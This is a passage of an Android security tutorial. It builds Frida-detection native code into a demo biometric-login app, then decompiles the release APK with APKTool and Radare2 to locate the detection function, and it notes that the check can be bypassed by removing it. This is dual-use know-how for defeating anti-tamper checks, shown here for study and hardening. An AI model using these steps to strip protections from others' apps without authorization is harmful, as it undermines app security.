        if (access(lib, F_OK) != -1) {
            exit(0);  // Frida detected, exit the application
        }
    }

    // 2. Check for Frida processes
    std::ifstream procList(&quot;/proc/self/maps&quot;);
    std::string line;
    while (std::getline(procList, line)) {
        if (line.find(&quot;frida&quot;) != std::string::npos) {
            exit(0);  // Frida detected, exit the application
        }
    }

    // 3. Check if Frida server is running on common ports
    std::ifstream netstat(&quot;/proc/net/tcp&quot;);
    while (std::getline(netstat, line)) {
        if (line.find(&quot;127.0.0.1:27042&quot;) != std::string::npos ||  // Default Frida port
            line.find(&quot;127.0.0.1:27043&quot;) != std::string::npos) {  // Alternative Frida port
            exit(0);  // Frida detected, exit the application
        }
    }
}


```
&lt;/details&gt;


In this implementation:

-   **Library Scanning** checks for known Frida libraries (`frida-agent`, `frida-gadget`, and `libfrida-gadget.so`). If any of these are detected, the app terminates.
-   **Process Scanning** reads from `/proc/self/maps` to find any memory mappings related to Frida, closing the app if they’re detected.
-   **Port Scanning** inspects `/proc/net/tcp` for connections to default Frida server ports (`27042` and `27043`), which would suggest that Frida is attempting to connect to the app.

#### Integrating the Detection in `MainActivity`

In this example, we’ll integrate the Frida detection function at the start of `onCreate` in `MainActivity` to immediately check for Frida when the app launches. In a real-world scenario, however, the detection code could be spread across multiple activities, with obfuscated names, making it harder to detect and bypass. For the sake of this example, though, we’ll keep it simple by placing the detection code at the beginning of `onCreate` in a single location. This setup will ensure that if Frida is detected, the app terminates before fully loading.

Here’s the updated `MainActivity` class, with `detectFridaAndExit()` called within the `onCreate` method:

&lt;details&gt;
&lt;summary&gt;Main Activity Code&lt;/summary&gt;

```kotlin
package com.example.localauth

import android.content.Intent
import android.app.AlertDialog
import android.content.DialogInterface
import android.os.Bundle
import android.util.Base64
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import java.security.KeyStore
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.SecretKey
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import android.util.Log
import javax.crypto.spec.GCMParameterSpec

class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) // sin &quot;lib&quot; y sin &quot;.so&quot;
        }
    }
    external fun detectFridaAndExit(): Boolean
    external fun stringFromJNI(): String

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val messageFromNative = stringFromJNI()
        Log.d(&quot;JNI&quot;, &quot;Message from C++: $messageFromNative&quot;)

        detectFridaAndExit()

        createKey()

        val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
        btnEncrypt.setOnClickListener {
            showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
        }

        val btnReset: Button = findViewById(R.id.btn_reset)
        btnReset.setOnClickListener {
            resetEncryptedData()
        }

        val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
        btnAuthenticate.setOnClickListener {
            showBiometricPrompt()
        }
    }


    // Create Key in Keystore
    private fun createKey() {
        val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
        val keyGenParameterSpec = KeyGenParameterSpec.Builder(
            keyAlias,
            KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
        ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
            .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
            .setUserAuthenticationRequired(true)
            .setInvalidatedByBiometricEnrollment(true)
            .setUserAuthenticationValidityDurationSeconds(-1)  // Require biometric every time
            .build()

        keyGenerator.init(keyGenParameterSpec)
        keyGenerator.generateKey()
    }

    // Initialize the cipher for encryption/decryption
    private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
        return try {
            keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
            keyStore.load(null)

            val key = keyStore.getKey(keyAlias, null) as SecretKey
            cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

            if (mode == Cipher.ENCRYPT_MODE) {
                cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
            } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
                val gcmSpec = GCMParameterSpec(128, iv)
                cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV
            }
            true
        } catch (e: Exception) {
            e.printStackTrace()
            false
        }
    }

    // Show biometric prompt and tie it to the cipher object
    private fun showBiometricPrompt() {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                    try {
                        val decryptedData = decryptData(cryptoObject)
                        if (decryptedData == null || !isValidData(decryptedData)) {
                            Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                        } else {
                            showSuccess()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Decryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                } else {
                    Toast.makeText(this@MainActivity, &quot;Authentication succeeded but CryptoObject is missing!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication&quot;)
                .setSubtitle(&quot;Log in using your fingerprint&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Updated: Fixing how cipher is used after biometric authentication completes
    private fun showBiometricPromptForEncryption(plainText: String) {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null) {
                    try {
                        // Encrypt after biometric authentication
                        val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                        if (encryptedData != null) {
                            val iv = cryptoObject.cipher?.iv  // Get the generated IV
                            storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                            Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                }
            }

            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.ENCRYPT_MODE)) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication for Encryption&quot;)
                .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Check if decrypted data is valid
    private fun isValidData(decryptedData: ByteArray): Boolean {
        return decryptedData.contentEquals(expectedData)  // Example validation
    }

    // Decrypt data using the CryptoObject
    private fun decryptData(cryptoObject: BiometricPrompt.CryptoObject): ByteArray? {
        return try {
            val encryptedData = Base64.decode(retrieveEncryptedData(), Base64.DEFAULT)
            val iv = retrieveStoredIV()  // Retrieve the stored IV
            if (initCipher(Cipher.DECRYPT_MODE, iv)) {  // Use the retrieved IV
                val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
                decryptedData
            } else {
                null
            }
        } catch (e: Exception) {
            e.printStackTrace()
            null
        }
    }

    private fun encryptAndStoreData(plainText: String) {
        if (initCipher(Cipher.ENCRYPT_MODE)) {
            try {
                val encryptedData = cipher.doFinal(plainText.toByteArray())
                val iv = cipher.iv  // Get the generated IV
                storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv)
            } catch (e: Exception) {
                e.printStackTrace()
                Toast.makeText(this, &quot;Encryption failed&quot;, Toast.LENGTH_SHORT).show()
            }
        }
    }

    // Simulate storing encrypted data and IV (replace with actual storage logic)
    private fun storeEncryptedDataAndIV(encryptedData: String, iv: ByteArray) {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.putString(&quot;encrypted_data&quot;, encryptedData)
        editor.putString(&quot;iv&quot;, Base64.encodeToString(iv, Base64.DEFAULT))  // Store the IV as Base64 string
        editor.apply()
    }

    // Retrieve encrypted data and IV
    private fun retrieveEncryptedData(): String {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        return sharedPreferences.getString(&quot;encrypted_data&quot;, &quot;&quot;) ?: &quot;&quot;
    }

    private fun retrieveStoredIV(): ByteArray {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val ivString = sharedPreferences.getString(&quot;iv&quot;, null)
        return Base64.decode(ivString, Base64.DEFAULT)
    }

    private fun showSuccess() {
        Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
        val intent = Intent(this, SuccessActivity::class.java)
        startActivity(intent)
        finish()  // Optionally finish MainActivity to prevent going back without re-authentication
    }
    private fun resetEncryptedData() {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.remove(&quot;encrypted_data&quot;)  // Remove encrypted data
        editor.remove(&quot;iv&quot;)  // Remove IV
        editor.apply()
        Log.d(&quot;Reset&quot;, &quot;Encrypted data and IV reset.&quot;)
        Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
    }

    // Show a message to the user when Frida is detected and close the app
    private fun showFridaDetectedDialog() {
        val builder = AlertDialog.Builder(this)
        builder.setTitle(&quot;Security Warning&quot;)
        builder.setMessage(&quot;Frida or another tampering tool has been detected. The app will now close for security reasons.&quot;)
        builder.setCancelable(false)
        builder.setPositiveButton(&quot;OK&quot;) { dialog: DialogInterface, _: Int -&gt;
            dialog.dismiss()
            closeApp()
        }
        val dialog: AlertDialog = builder.create()
        dialog.show()
    }

    // Method to close the app
    private fun closeApp() {
        Toast.makeText(this, &quot;Closing app...&quot;, Toast.LENGTH_SHORT).show()
        finishAffinity()  // Close the app completely
    }
}

```
&lt;/details&gt;


#### Explanation of Changes

1.  **Immediate Frida Detection**:  
    We call `detectFridaAndExit()` at the beginning of `onCreate()`. This approach checks for Frida as soon as the app starts, terminating it immediately if any suspicious libraries or processes are detected.
2.  **Native Function Call Setup**:  
    The `detectFridaAndExit()` function relies on the native library loaded in the companion object (`System.loadLibrary(&quot;native-lib&quot;)`), which ensures our Frida detection logic is ready to execute upon launch.

# Building the Release Version of the APK

In this section, we’re going to create a release APK so we can later reverse-engineer it, simulating the process of analyzing an app as if it were in a real-world scenario.

Now, with the code set up, we’ll enable obfuscation with ProGuard (or R8, its default replacement). Obfuscation adds a layer of complexity by renaming classes, methods, and variables to make the code harder to interpret if someone tries to reverse-engineer it. This is especially useful here since our example includes Frida detection code in the native library, and we want to see how that looks after the obfuscation process.

To enable ProGuard, go to the `build.gradle` file for the app module and locate the `release` build type. Here, we’ll set `minifyEnabled` to `true`. For this example, we’ll keep things simple and leave the `proguard-rules.pro` file as-is, allowing Android Studio to apply its default obfuscation rules.

![](/content/images/2024/10/image-6.png)

Proguard set up

With obfuscation configured, we need to create a signing key. In Android Studio, go to **Build** &gt; **Generate Signed Bundle / APK...** and choose **APK**. If you don’t have a keystore yet, select **Create new...** and fill in the required details: the keystore location, password, key alias, and key-specific password. This signing key will serve as the app’s unique digital signature, verifying its authenticity. Make sure to store the keystore file securely, as it’s essential for future APK versions.

![](/content/images/2024/10/image-5.png)

Keystore set up

Finally, let’s build the APK. Go back to **Build** &gt; **Generate Signed Bundle / APK...**, select **release** as the build type, enter your keystore details, and let Android Studio handle the compilation and signing process. The resulting APK will be stored in the `app/build/outputs/apk/release` folder.

# Verifying Frida Detection in the Release APK

Now that we’ve built the release APK with Frida detection enabled, let’s test it by attempting to attach Frida to the app. If our detection code is working as expected, the app should terminate as soon as Frida attempts to connect, signaling that the detection mechanism is actively blocking the debugger.

To test this, run Frida with the following command:

```bash
frida -U -f com.example.localauth -l methods.js

```

Methods.js

```javascript
Java.perform(function() {
    var MainActivity = Java.use(&apos;com.example.localauth.MainActivity&apos;);
    console.log(&quot;Listando métodos de MainActivity:&quot;);
    console.log(MainActivity.class.getDeclaredMethods());
});

```

This command tells Frida to attach to the app with the specified package name (`com.example.localauth`) and load a JavaScript file (`methods.js`) to interact with the app. Once executed, Frida will attempt to spawn the app and connect to it.

As seen in the output, Frida successfully lists the methods in `MainActivity`, indicating it’s connected. However, immediately afterward, the **Process terminated** message appears. This confirms that the Frida detection mechanism in the `detectFridaAndExit` function is working correctly. The detection code recognizes the presence of Frida and forces the app to exit, terminating the session.

![](/content/images/2024/10/image-20.png)

Frida Detection

# Limitations of Basic Obfuscation in Hiding Detection Functions

After generating the release APK with basic obfuscation enabled, we can see one of the limitations of leaving ProGuard (or R8) with default settings. Many developers rely on these default settings, but as shown in the images, the Frida detection function `detectFridaAndExit` is still easily identifiable in the code. Even with obfuscation, the function name is readable, making it relatively straightforward for someone analyzing the APK to locate it.

In this case, a reverse engineer could quickly search for &quot;Frida&quot; or similar keywords and easily find this function ([in this case I have used Jadx](https://github.com/skylot/jadx)). Once located, they could bypass the detection by modifying the APK to remove or comment out this function, rendering the Frida detection ineffective. This demonstrates how default obfuscation offers only a basic level of protection and may not be sufficient for apps that require robust security measures.

![](/content/images/2024/10/image-21.png)

Code obfuscated

![](/content/images/2024/10/image-22.png)

Searching for Frida

![](/content/images/2024/10/image-23.png)

Detection of the function

In more advanced setups, developers might apply custom obfuscation rules, rename critical functions to obscure names, or distribute detection checks throughout the code in non-obvious ways. This would make the detection mechanism much harder to identify and bypass. For example, spreading detection logic across various activities and randomizing function names would increase the difficulty significantly for anyone attempting to reverse-engineer the app.

In our example, we left obfuscation in its simplest form for demonstration purposes. However, for real-world applications requiring high levels of security, more tuned and advanced obfuscation would be necessary to effectively protect detection mechanisms like this one.

# Decompiling the APK to Access the Native Library

Shifting from obfuscation and with our release APK now prepared, the next step is to decompile it to access the files within, focusing on extracting the native library. This will allow us to inspect the Frida detection code and prepare for reverse-engineering. We’ll use APKTool, a powerful tool widely used in Android reverse engineering, to unpack APK files and access their resources and code.

Start by running APKTool on the release APK. The command below will decompile the APK and place the output in a directory called `testing`:

![](/content/images/2024/10/image-12.png)

Decompiling the application

Let’s break down the command:

-   `d` stands for &quot;decompile.&quot;
-   `-f` forces overwriting any existing output directory.
-   `-r` tells APKTool to skip decoding resources, which speeds up the decompilation and, in this case, prevents resource issues that can arise when modifying native libraries. By avoiding resource decoding, we can later make changes to the native library without APKTool trying to recompile resources, [which could potentially cause compatibility issues.](https://github.com/iBotPeaches/Apktool/issues/1626)
-   `-o testing` specifies the output directory, where APKTool will place the decompiled files.

After running this command, APKTool will extract the APK contents into the `testing` directory, as shown in the screenshot, copying files like `classes.dex`, assets, and libraries.

Next, navigate to the `lib` folder in the decompiled directory. Here, you’ll see subdirectories for each supported architecture, such as `x86_64`, `armeabi-v7a`, etc. In this case, we’ll be focusing on `x86_64` because we plan to test the APK on an emulator, which typically uses the x86\_64 architecture for compatibility. You should find `libnative-lib.so` within the `lib/x86_64` directory.

![](/content/images/2024/10/image-13.png)

Libnative-lib

# Analyzing the Native Library with Radare2

With our `libnative-lib.so` extracted from the decompiled APK, the next step is to analyze this native library to locate and understand the Frida detection logic. For this, we’ll use Radare2 (often referred to as `r2`), a powerful open-source reverse-engineering tool. Radare2 will help us disassemble the library, search for specific functions, and inspect the code in detail.

&lt;details&gt;
&lt;summary&gt;Start by launching Radare2 in write mode on the native library file with the following command:&lt;/summary&gt;

```bash
r2 -w libnative-lib.so

```
&lt;/details&gt;


Radare2 will load the library, displaying initial warnings about unknown entry points. This is common, as Radare2 might struggle to identify the exact start point without additional configuration. However, we can still proceed with our analysis.

Once inside Radare2, run a preliminary analysis with:

```bash
aaa

```

![](/content/images/2024/10/image-15.png)

Analyzing the binary

This command performs an in-depth analysis, which includes identifying functions, cross-references, and other important structures in the binary. You may see warnings about invalid addresses or incomplete analysis; Radare2 often needs to interpret these files without all the metadata available, but it still provides a functional disassembly.

To locate our Frida detection function, let’s search for references to &quot;frida&quot; within the binary:

![](/content/images/2024/10/image-16.png)

Detecting the function

This command looks through the symbol information and filters for any mention of &quot;frida,&quot; which helps us quickly pinpoint relevant functions or symbols. As shown in the screenshot, the search reveals a function called `Java_com_example_localauth_MainActivity_detectFridaAndExit` at address `0x00060b50`. This is our target function containing the Frida detection logic we implemented in the native code.

Now, we can disassemble this function to analyze it more closely. Use the following command:

```bash
pd @ 0x00060b50

```

![](/content/images/2024/10/image-8.png)

Assembly&apos;s code of detectfridaandexit

The `pd` command disassembles the code at the specified address, revealing the actual instructions within `detectFridaAndExit`. In the disassembly, you’ll see the low-level operations that implement our Frida checks, such as loading suspicious strings into memory, comparing addresses, and pushing values onto the stack.

Here, we can begin to see how Radare2 interprets our C++ code in assembly language, showing how each check within `detectFridaAndExit` is translated into machine-level instructions. This disassembly provides a detailed view of the function&apos;s behavior and allows us to verify that the detection checks we coded (such as searching for Frida libraries and processes) are present and functioning as expected.

If interpreting the assembly code becomes too complex, you can simplify the analysis by using the [Ghidra decompiler plugin for Radare2](https://github.com/radareorg/r2ghidra). This plugin integrates Ghidra’s powerful decompiler directly into Radare2, allowing you to convert assembly code into a more readable, C-like structure within the Radare2 environment. This can be incredibly helpful for understanding complex functions at a higher level, as it provides pseudocode instead of raw assembly instructions, making intricate code easier to interpret.

```bash
pdg @0x00060b50

```

![](/content/images/2024/10/image-24.png)

Using the command of the Ghidra plugin

&lt;details&gt;
&lt;summary&gt;Decompiled assembler code with ghidra plugin&lt;/summary&gt;

```cpp
void sym.Java_com_example_localauth_MainActivity_detectFridaAndExit(void)

{
    uint32_t *puVar1;
    uchar *puVar2;
    int64_t iVar3;
    int64_t iVar4;
    code *pcVar5;
    ulong uVar6;
    uchar auVar7 [16];
    char cVar8;
    int32_t iVar9;
    int64_t *piVar10;
    uint32_t *puVar11;
    uchar *puVar12;
    int64_t *piVar13;
    uint64_t *puVar14;
    uint64_t uVar15;
    uint64_t uVar16;
    uchar *puVar17;
    uchar *puVar18;
    uchar *puVar19;
    uchar *puVar20;
    uchar *puVar21;
    uchar *puVar22;
    uchar *puVar23;
    uchar *puVar24;
    uchar *puVar25;
    uchar *puVar26;
    uchar *puVar27;
    uchar *puVar28;
    uchar *puVar29;
    uchar *puVar30;
    uchar *puVar31;
    uint64_t *puVar32;
    int64_t in_FS_OFFSET;
    bool bVar33;
    ulong uStack_300;
    uchar auStack_2f8 [16];
    ulong auStack_2e8 [2];
    uchar auStack_2d8 [336];
    uchar auStack_188 [336];
    ulong uStack_38;

    uStack_38 = *(in_FS_OFFSET + 0x28);
    uStack_300 = 0x60b80;
    iVar9 = sym.imp.access(&quot;frida-agent&quot;, 0);
    puVar21 = &amp;stack0xfffffffffffffd08;
    if (iVar9 == -1) {
        *(&amp;stack0xfffffffffffffd08 + -8) = 0x60b97;
        iVar9 = sym.imp.access(0x42ee8, 0);
        puVar21 = *0x20 + -0x2f8;
        if (iVar9 == -1) {
            *(*0x20 + -0x300) = 0x60bae;
            iVar9 = sym.imp.access(0x42de5, 0);
            puVar21 = &amp;stack0xfffffffffffffd08;
            if (iVar9 == -1) {
                iVar3 = *0x20 + -0x188;
                *(&amp;stack0xfffffffffffffd08 + -8) = 0x60bd3;
                fcn.00061040(iVar3, &quot;/proc/self/maps&quot;, 8);
                puVar21 = *0x20 + -0x2f8;
                auVar7._8_8_ = 0;
                auVar7._0_8_ = 0;
                *(*0x20 + -0x2f8) = auVar7;
                *(&amp;stack0xfffffffffffffd08 + 0x10) = 0;
                puVar2 = &amp;stack0xfffffffffffffd08 + 0x20;
code_r0x00060c11:
                do {
                    iVar4 = *(*(puVar21 + 0x170) + -0x18);
                    *(puVar21 + -8) = 0x60c28;
                    fcn.000c9380(puVar2, iVar3 + iVar4);
                    puVar17 = puVar21;
                    *(puVar21 + -8) = 0x60c37;
                    piVar10 = fcn.000c9390(puVar2, _reloc.std::__ndk1::ctype_char_::id);
                    pcVar5 = *(*piVar10 + 0x38);
                    puVar18 = puVar17;
                    *(puVar17 + -8) = 0x60c45;
                    cVar8 = (*pcVar5)(piVar10, 10);
                    puVar19 = puVar18;
                    *(puVar18 + -8) = 0x60c4f;
                    fcn.000c93a0(puVar2);
                    *(puVar19 + -8) = 0x60c5e;
                    piVar10 = fcn.000611b0(iVar3, *0x20 + -0x2f8, cVar8);
                    puVar21 = puVar19;
                    puVar20 = puVar19;
                    if ((*(piVar10 + *(*piVar10 + -0x18) + 0x20) &amp; 5) != 0) {
                        *(puVar19 + -8) = 0x60d38;
                        fcn.00061040(puVar19 + 0x20, 0x422f8, 8);
                        puVar21 = puVar19;
                        puVar2 = puVar19 + 0x18;
                        goto code_r0x00060d71;
                    }
                    if ((*puVar19 &amp; 1) == 0) {
                        uVar15 = *puVar19 &gt;&gt; 1;
                        puVar31 = puVar19 + 1;
                        if (SBORROW8(uVar15, 5) == uVar15 + -5 &lt; 0) goto code_r0x00060ca1;
                    }
                    else {
                        uVar15 = *(puVar19 + 8);
                        puVar31 = *(puVar19 + 0x10);
                        if (SBORROW8(uVar15, 5) == uVar15 + -5 &lt; 0) {
code_r0x00060ca1:
                            puVar1 = puVar31 + uVar15;
                            puVar12 = puVar31;
                            do {
                                *(puVar20 + -8) = 0x60cc1;
                                puVar11 = sym.imp.memchr(puVar12, 0x66, uVar15 - 4);
                                puVar21 = puVar20;
                                if (puVar11 == NULL) break;
                                if ((*(puVar11 + 1) ^ 0x61 | *puVar11 ^ 0x64697266) == 0) {
                                    if (puVar11 != puVar1) {
                                        if (puVar11 - puVar31 == -1) goto code_r0x00060c11;
                                        goto code_r0x00060d04;
                                    }
                                    break;
                                }
                                puVar12 = puVar11 + 1;
                                uVar15 = puVar1 - puVar12;
                            } while (SBORROW8(uVar15, 5) == uVar15 + -5 &lt; 0);
                        }
                    }
                } while (true);
code_r0x00060d04:
                if (*(in_FS_OFFSET + 0x28) == *(puVar21 + 0x2c0)) {
    // WARNING: Subroutine does not return
                    *(puVar21 + -8) = 0x60d22;
                    sym.imp.exit(0);
                }
                goto code_r0x00061034;
            }
        }
    }
    if (*(in_FS_OFFSET + 0x28) == *(puVar21 + 0x2c0)) {
    // WARNING: Subroutine does not return
        *(puVar21 + -8) = 0x60fc6;
        sym.imp.exit(0);
    }
    goto code_r0x00061034;
code_r0x00060d71:
    do {
        iVar3 = *(*(puVar21 + 0x20) + -0x18);
        *(puVar21 + -8) = 0x60d8a;
        fcn.000c9380(puVar2, puVar21 + 0x20 + iVar3);
        puVar22 = puVar21;
        *(puVar21 + -8) = 0x60d99;
        piVar10 = fcn.000c9390(puVar2, _reloc.std::__ndk1::ctype_char_::id);
        pcVar5 = *(*piVar10 + 0x38);
        puVar23 = puVar22;
        *(puVar22 + -8) = 0x60da7;
        cVar8 = (*pcVar5)(piVar10, 10);
        *(puVar23 + -8) = 0x60db1;
        fcn.000c93a0(puVar2);
        *(puVar23 + -8) = 0x60dc0;
        piVar13 = fcn.000611b0(puVar21 + 0x20, puVar23, cVar8);
        piVar10 = _reloc.VTT_for_std::__ndk1::basic_ifstream_char__std::__ndk1::char_traits_char___;
        puVar21 = puVar22 + 0;
        puVar24 = puVar22 + 0;
        if ((*(piVar13 + *(*piVar13 + -0x18) + 0x20) &amp; 5) != 0) {
            iVar3 = *_reloc.VTT_for_std::__ndk1::basic_ifstream_char__std::__ndk1::char_traits_char___;
            iVar4 = _reloc.VTT_for_std::__ndk1::basic_ifstream_char__std::__ndk1::char_traits_char___[3];
            *(puVar23 + 0x20) = iVar3;
            *(puVar23 + *(iVar3 + -0x18) + 0x20) = iVar4;
            puVar26 = puVar22 + 0;
            *(puVar22 + -8) = 0x60f17;
            fcn.000c93d0(puVar23 + 0x30);
            puVar27 = puVar26;
            *(puVar26 + -8) = 0x60f28;
            fcn.000c93e0(puVar22 + 0x20, piVar10 + 1);
            *(puVar27 + -8) = 0x60f35;
            fcn.000c93f0(puVar26 + 0xd8);
            puVar28 = puVar27;
            if ((*puVar27 &amp; 1) != 0) {
                uVar6 = *(puVar27 + 0x10);
                *(puVar27 + -8) = 0x60f45;
                fcn.000c9350(uVar6);
                puVar28 = puVar27 + 0;
            }
            *(puVar28 + 0x170) = iVar3;
            *(puVar28 + *(iVar3 + -0x18) + 0x170) = iVar4;
            puVar29 = puVar28;
            *(puVar28 + -8) = 0x60f66;
            fcn.000c93d0(puVar28 + 0x180);
            puVar30 = puVar29;
            *(puVar29 + -8) = 0x60f76;
            fcn.000c93e0(puVar28 + 0x170, piVar10 + 1);
            *(puVar30 + -8) = 0x60f83;
            fcn.000c93f0(puVar29 + 0x228);
            puVar21 = puVar30;
            if (*(in_FS_OFFSET + 0x28) == *(puVar30 + 0x2c0)) {
                return;
            }
            goto code_r0x00061034;
        }
        uVar15 = puVar22[0] &gt;&gt; 1;
        bVar33 = (puVar22[0] &amp; 1) == 0;
        puVar31 = *(puVar23 + 0x10);
        if (bVar33) {
            puVar31 = puVar23 + 1;
        }
        if (!bVar33) {
            uVar15 = *(puVar23 + 8);
        }
        if (SBORROW8(uVar15, 0xf) == uVar15 + -0xf &lt; 0) {
            puVar32 = puVar31 + uVar15;
            puVar12 = puVar31;
            uVar16 = uVar15;
            while( true ) {
                *(puVar24 + -8) = 0x60e21;
                puVar14 = sym.imp.memchr(puVar12, 0x31, uVar16 - 0xe);
                puVar21 = puVar24;
                puVar25 = puVar24;
                if (puVar14 == NULL) break;
                if ((*(puVar14 + 7) ^ 0x32343037323a312e | *puVar14 ^ 0x2e302e302e373231) == 0) {
                    if ((puVar14 != puVar32) &amp;&amp; (puVar14 - puVar31 != -1)) goto code_r0x00060ed3;
                    break;
                }
                puVar12 = puVar14 + 1;
                uVar16 = puVar32 - puVar12;
                if (SBORROW8(uVar16, 0xf) != uVar16 + -0xf &lt; 0) break;
            }
            puVar12 = puVar31;
            if (SBORROW8(uVar15, 0xf) == uVar15 + -0xf &lt; 0) {
                do {
                    *(puVar25 + -8) = 0x60e84;
                    puVar14 = sym.imp.memchr(puVar12, 0x31, uVar15 - 0xe);
                    puVar21 = puVar25;
                    if (puVar14 == NULL) break;
                    if ((*(puVar14 + 7) ^ 0x33343037323a312e | *puVar14 ^ 0x2e302e302e373231) == 0) {
                        if (puVar14 != puVar32) {
                            if (puVar14 - puVar31 == -1) goto code_r0x00060d71;
                            goto code_r0x00060ed3;
                        }
                        break;
                    }
                    uVar15 = puVar32 - (puVar14 + 1);
                    puVar12 = puVar14 + 1;
                } while (SBORROW8(uVar15, 0xf) == uVar15 + -0xf &lt; 0);
            }
        }
    } while (true);
code_r0x00060ed3:
    if (*(in_FS_OFFSET + 0x28) == *(puVar21 + 0x2c0)) {
    // WARNING: Subroutine does not return
        *(puVar21 + -8) = 0x60ef1;
        sym.imp.exit(0);
    }
code_r0x00061034:
    // WARNING: Subroutine does not return
    *(puVar21 + -8) = 0x61039;
    sym.imp.__stack_chk_fail();
}

```
&lt;/details&gt;


As an extra tip, if you still find it challenging to interpret the assembly or decompiled pseudocode, you can copy the assembly code and paste it into ChatGPT. ChatGPT can analyze the code and provide a more understandable pseudocode version, breaking down each part of the function and explaining it in simpler terms. This combination of tools allows for a comprehensive understanding, making even complex native code more approachable.

&lt;details&gt;
&lt;summary&gt;ChatGPT pseudocode&lt;/summary&gt;

```cpp
function detectFridaAndExit()

    // Stack setup and saving current state
    save_current_stack_state()
    
    // Check if the &quot;frida-agent&quot; string is found in the system
    if access(&quot;frida-agent&quot;) != -1 then
        exit_program()
    end if

    // Check if the &quot;frida-gadget&quot; string is found in the system
    if access(&quot;frida-gadget&quot;) != -1 then
        exit_program()
    end if

    // Check if the &quot;libfrida-gadget.so&quot; library is found in the system
    if access(&quot;libfrida-gadget.so&quot;) != -1 then
        exit_program()
    end if

    // Read and parse the &quot;/proc/self/maps&quot; to look for Frida-related strings
    maps_data = read_file(&quot;/proc/self/maps&quot;)
    for each line in maps_data do
        // Look for &quot;frida&quot; or related patterns in the process memory
        if line contains &quot;frida&quot; then
            exit_program()
        end if
    end for

    // Additional check: inspect &quot;/proc/net/tcp&quot; for Frida&apos;s presence
    tcp_data = read_file(&quot;/proc/net/tcp&quot;)
    if tcp_data contains &quot;127.0.0.1:27042&quot; or &quot;127.0.0.1:27043&quot; then
        exit_program()
    end if

